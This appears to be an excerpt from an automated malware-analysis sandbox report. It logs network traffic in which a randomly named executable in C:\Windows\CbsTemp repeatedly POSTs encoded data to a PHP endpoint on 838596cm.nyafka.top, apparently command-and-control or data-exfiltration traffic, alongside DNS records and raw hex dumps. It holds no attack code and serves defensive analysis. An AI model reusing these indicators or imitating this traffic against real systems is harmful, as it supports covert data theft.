                                                                                                          Jan 8, 2025 17:14:43.118020058 CET5012280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:43.122802019 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:43.473115921 CET5012280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:43.478122950 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:43.478141069 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:43.478148937 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:43.566772938 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:43.613678932 CET5012280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:43.815283060 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:43.863646030 CET5012280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:43.902657032 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:43.957396984 CET5012280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.018699884 CET5012280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.019294024 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.023736000 CET8050122104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.023797989 CET5012280192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.024100065 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.024168968 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.024257898 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.029011011 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.379733086 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.384712934 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.384726048 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.384741068 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.500855923 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.551136017 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.728779078 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.769882917 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.845546961 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.845788956 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.850631952 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.850703001 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.850786924 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.850788116 CET8050123104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:44.850835085 CET5012380192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:44.855551958 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.207487106 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.212328911 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.212399960 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.212409973 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.332664967 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.379281044 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.504025936 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.551140070 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.636528969 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.641546965 CET8050124104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.642096043 CET5012480192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.642616987 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.647411108 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:45.647480965 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.647558928 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:45.652364969 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.004379988 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.009495020 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.009507895 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.009519100 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.088675976 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.129271984 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.259602070 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.301139116 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.376811028 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.377031088 CET5012680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.383044004 CET8050125104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.383059025 CET8050126104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.383107901 CET5012580192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.383145094 CET5012680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.383224010 CET5012680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.388385057 CET8050126104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.443043947 CET5012780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.443125963 CET5012680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.447985888 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.450227022 CET5012780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.490659952 CET8050126104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.538193941 CET5012780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.543066025 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.660582066 CET5012880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.666498899 CET8050128104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.666574955 CET5012880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.666691065 CET5012880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.672404051 CET8050128104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.765321970 CET8050126104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.765408039 CET5012680192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.894947052 CET5012780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:46.899878979 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.899904013 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:46.902865887 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:47.122488976 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:47.126219988 CET5012780192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:47.154825926 CET8050128104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:47.179752111 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:47.238678932 CET5012880192.168.2.5104.21.112.1
                                                                                                          Jan 8, 2025 17:14:47.268209934 CET8050127104.21.112.1192.168.2.5
                                                                                                          Jan 8, 2025 17:14:47.270225048 CET5012780192.168.2.5104.21.112.1
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 8, 2025 17:12:55.403954983 CET5146253192.168.2.51.1.1.1
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET53514621.1.1.1192.168.2.5
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Jan 8, 2025 17:12:55.403954983 CET192.168.2.51.1.1.10xfe3fStandard query (0)838596cm.nyafka.topA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET1.1.1.1192.168.2.50xfe3fNo error (0)838596cm.nyafka.top104.21.112.1A (IP address)IN (0x0001)false
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET1.1.1.1192.168.2.50xfe3fNo error (0)838596cm.nyafka.top104.21.96.1A (IP address)IN (0x0001)false
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET1.1.1.1192.168.2.50xfe3fNo error (0)838596cm.nyafka.top104.21.48.1A (IP address)IN (0x0001)false
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET1.1.1.1192.168.2.50xfe3fNo error (0)838596cm.nyafka.top104.21.16.1A (IP address)IN (0x0001)false
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET1.1.1.1192.168.2.50xfe3fNo error (0)838596cm.nyafka.top104.21.32.1A (IP address)IN (0x0001)false
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET1.1.1.1192.168.2.50xfe3fNo error (0)838596cm.nyafka.top104.21.80.1A (IP address)IN (0x0001)false
                                                                                                          Jan 8, 2025 17:12:55.765688896 CET1.1.1.1192.168.2.50xfe3fNo error (0)838596cm.nyafka.top104.21.64.1A (IP address)IN (0x0001)false
                                                                                                          • 838596cm.nyafka.top
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.549853104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:12:55.777849913 CET348OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 344
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:12:56.133930922 CET344OUTData Raw: 05 06 01 07 06 0c 01 00 05 06 02 01 02 02 01 01 00 04 05 09 02 06 03 0f 02 06 0f 53 07 07 03 06 0f 0e 05 0d 00 06 06 06 0c 04 07 0b 04 05 06 06 06 01 0d 09 0f 50 04 06 06 07 07 03 04 02 06 09 00 03 0c 08 05 0e 06 51 0c 50 0b 07 0f 04 0e 06 06 03
                                                                                                          Data Ascii: SPQPTTR\L~Nj@vb[Ove`@|oeOclpM~sQ_l|UzpXknttwZ~_~V@xSTN}\S
                                                                                                          Jan 8, 2025 17:12:56.495764017 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:12:56.761533976 CET1236INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:12:56 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pjhHzNZAhLshmEMzx%2FkoCMFBx5cOzmtcv%2FweXtVW4CMGW0AIYu3MP6%2FiXgkjhSc8MYDSqu%2FNWmGW4FReCwHBtCU7wMvU9KrGnGxz8LBTCbUjnwsmSCFEVUhiqJU7VubwWhQNKVQ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78d4cce6c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=31708&min_rtt=29799&rtt_var=14994&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=692&delivery_rate=32388&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 35 35 38 0d 0a 56 4a 7d 58 7a 6d 64 5f 79 61 7b 5a 68 5f 7f 03 69 74 73 08 7f 06 62 53 79 5d 70 05 6a 5c 5d 58 63 73 5b 40 7a 4f 7e 5f 62 5f 78 03 7c 71 78 01 55 4b 72 51 74 62 7f 06 6b 62 5c 5f 68 77 66 41 7b 5f 70 09 7c 63 7c 59 75 61 61 4e 76 62 7d 49 6b 58 62 48 6a 7f 78 08 7d 59 67 06 77 76 7b 06 7c 5b 69 47 7e 5e 6d 03 6f 59 78 43 6f 59 7c 4d 7b 6d 67 00 79 61 70 01 7b 63 7a 4f 6b 4e 5d 59 6f 64 7c 4b 7d 5c 55 07 76 61 70 48 7a 51 41 5b 68 59 56 41 7d 62 66 53 77 6c 6c 05 6c 55 74 4b 76 73 7e 0c 7b 72 6e 58 6a 6f 7a 07 7b 71 62 03 62 5d 60 5a 75 5f 78 07 76 71 76 50 7e 5d 7a 06 77 5c 6d 07 61 66 7c 09 6b 7c 66 58 77 7c 7f 5d 7f 5d 6c 02 78 6f 7f 03 6c 59 76 01 6b 6d 7c 08 60 67 6c 02 7e 62 62 09 7e 7e 63 09 7b 43 7e 06 7e 5b 75 06 7b 5d 46 51 7c 6f 63 50 6a 60 67 54 7d 67 54 01 78 54 7c 59 78 4c 56 49 6b 61 7f 03 7d 77 73 42 7f 4e 58 53 79 5a 70 07 7d 61 78 01 63 5d 57 51 7b 5c 79 49 75 66 68 4b 7d 66 70 4d 7e 48 5b 0d 74 4c 7f 03 7d 62 57 06 7f 67 62 08 7b 58 70 0d 7d 63 73 00 77 62 79 02 76 [TRUNCATED]
                                                                                                          Data Ascii: 558VJ}Xzmd_ya{Zh_itsbSy]pj\]Xcs[@zO~_b_x|qxUKrQtbkb\_hwfA{_p|c|YuaaNvb}IkXbHjx}Ygwv{|[iG~^moYxCoY|M{mgyap{czOkN]Yod|K}\UvapHzQA[hYVA}bfSwlllUtKvs~{rnXjoz{qbb]`Zu_xvqvP~]zw\maf|k|fXw|]]lxolYvkm|`gl~bb~~c{C~~[u{]FQ|ocPj`gT}gTxT|YxLVIka}wsBNXSyZp}axc]WQ{\yIufhK}fpM~H[tL}bWgb{Xp}cswbyvqqGOb|xA~IcuasGxLq|puKxwlyw`Lx}{zLV{sbA|`l{g`J~r]OvOxH}lQK|wpA}qqNv|hA{lpKw`rzqm~BXAxqXHv]]Ju
                                                                                                          Jan 8, 2025 17:12:56.761555910 CET938INData Raw: 5f 7c 03 77 71 5c 09 7f 4e 54 04 76 62 53 4f 76 65 78 0b 7f 7c 75 00 76 7c 74 06 7c 73 5e 49 78 6c 7f 01 78 60 72 00 7d 6d 78 4e 77 49 70 02 7e 4c 72 42 7c 7d 63 0c 78 53 7e 06 7e 5c 71 03 7c 5e 5a 08 7c 52 60 4e 7e 4e 5a 42 7e 49 66 01 78 7d 6b
                                                                                                          Data Ascii: _|wq\NTvbSOvex|uv|t|s^Ixlx`r}mxNwIp~LrB|}cxS~~\q|^Z|R`N~NZB~Ifx}kyrt|OYJ}Iw~pazs|~\lHt]ayOiKuf||vV}fyw\\S|YTxXt}cwHu\[waq|qj~llC~YKvqYzbSH}^}{g`L{wlLxSYz\VKzsn{]NZxYl}\UOuXx}|R^|hka@b`O{l`KwcbzOS
                                                                                                          Jan 8, 2025 17:12:57.501565933 CET324OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 384
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:12:57.603087902 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:12:57.603282928 CET384OUTData Raw: 55 5c 5e 50 59 51 56 59 5e 5f 57 54 56 5f 59 59 57 50 58 59 50 55 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^PYQVY^_WTV_YYWPXYPUV_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X+8#_$#>_*-9[/ >.&=()'-('Y>< 5-'Y:?#_&'P-#
                                                                                                          Jan 8, 2025 17:12:57.853785992 CET969INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:12:57 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LHyuRNL5QatkT%2BxNOWAZoYgpaD0YH%2FQ36h8bZ7Cz%2FIyHkxkpnGHDnxBvuSQ5t7NGg%2FALisFqMwvbORI29PM2uJX%2BlPF4k916apAlHFTs7gX9jGiQ%2B6Qsiv3Dx%2BCFwCW%2Bupg1eZ4i"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78dbbc72c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=30288&min_rtt=1477&rtt_var=16304&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2224&recv_bytes=1400&delivery_rate=2855280&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0f 24 2d 37 03 37 2b 2d 55 3f 2a 01 5b 29 0a 2e 5f 3a 39 2b 02 27 34 3f 07 27 3c 30 10 20 3c 22 03 2a 3b 2d 11 27 18 33 0e 28 01 20 5c 04 1f 24 58 3f 28 0c 0c 3e 01 3a 58 24 0a 25 1e 32 33 34 59 25 2d 3b 58 26 3a 32 56 23 07 24 09 2c 1d 31 08 2d 28 30 5c 28 24 28 5b 33 2e 2f 50 0f 10 38 19 39 07 3f 5c 20 21 00 11 21 30 27 5b 37 26 27 07 3d 2d 20 0a 23 2f 29 18 27 30 36 0f 37 32 27 55 27 1d 24 05 2b 21 06 52 2b 19 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98'$-77+-U?*[)._:9+'4?'<0 <"*;-'3( \$X?(>:X$%234Y%-;X&:2V#$,1-(0\($([3./P89?\ !!0'[7&'=- #/)'0672'U'$+!R+$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.549862104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:12:57.778233051 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:12:58.129482985 CET2532OUTData Raw: 55 54 5e 56 59 5e 56 5e 5e 5f 57 54 56 5d 59 53 57 5e 58 5a 50 5d 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT^VY^V^^_WTV]YSW^XZP]VZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X*(403>>=Y8\*1)+'8"(2$=;"-:#_&'P-+
                                                                                                          Jan 8, 2025 17:12:58.223294973 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:12:58.453341007 CET808INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:12:58 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7N6cM%2Fex67dUIw8%2FgvdDwrYqXHjk9A0GdYL6SvKANJYgar%2BFpZ2ZTvCl9i0qwXlQilObrwIMuI9RARrvz4Zu3Zs3RHixxWiawgHqwgTx37qj%2FQ1%2FgnfgjS3eK2W2JNRYHBATY5VV"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78df98aac34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3329&min_rtt=1447&rtt_var=4307&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=88463&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.549863104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:12:58.109673977 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1816
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:12:58.457756996 CET1816OUTData Raw: 50 56 5e 52 5c 5d 56 52 5e 5f 57 54 56 5e 59 5d 57 51 58 5a 50 5d 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^R\]VR^_WTV^Y]WQXZP]V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#?+('#=[)8$=_=+=\0=(3]) Z5(:#_&'P-
                                                                                                          Jan 8, 2025 17:12:58.563843966 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:12:58.833919048 CET955INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:12:58 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COWFNyq%2B1jQq1sYD1%2BJcYvVzNS91Ux6po1OGYX2rb4TMaAkXCNIJQ6ZWl4s1COTazawAyE940rs63Qlpz4n0m9wiYUdXZjTJ%2FoHq2OoW92j46p%2FUWMN22JlCzBcO3zN9Qfl2C4tv"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78e1beaf727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4195&min_rtt=1907&rtt_var=5292&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2141&delivery_rate=72223&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0d 27 03 2c 5a 22 38 21 55 3f 03 30 06 3d 33 22 5a 3a 39 28 5c 25 1a 02 5c 26 12 2c 10 22 2c 39 5f 3f 06 2e 01 30 08 3b 0e 2a 2b 20 5c 04 1f 27 05 2b 38 29 57 3d 11 2e 14 27 55 32 03 32 0a 3c 13 31 5b 27 5b 33 00 22 55 20 5f 30 0e 2f 30 26 1a 3a 3b 3f 00 28 37 2c 11 24 2e 2f 50 0f 10 38 51 2c 29 2f 5d 21 0f 08 54 35 20 3b 11 37 26 24 10 3e 2d 3b 55 22 01 39 5e 24 33 39 50 34 22 24 0c 33 1d 3f 5a 3f 57 3c 10 2b 09 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98'',Z"8!U?0=3"Z:9(\%\&,",9_?.0;*+ \'+8)W=.'U22<1['[3"U _0/0&:;?(7,$./P8Q,)/]!T5 ;7&$>-;U"9^$39P4"$3?Z?W<+$U,,I?XR0
                                                                                                          Jan 8, 2025 17:12:58.903558016 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:12:59.000051975 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:12:59.000236034 CET2532OUTData Raw: 55 57 5e 54 5c 5b 56 52 5e 5f 57 54 56 58 59 5b 57 5e 58 52 50 55 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UW^T\[VR^_WTVXY[W^XRPUV[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Y+(,3>1/<>.:>8"'8:<#Y*/">#Y9?#_&'P-?
                                                                                                          Jan 8, 2025 17:12:59.375204086 CET804INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:12:59 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
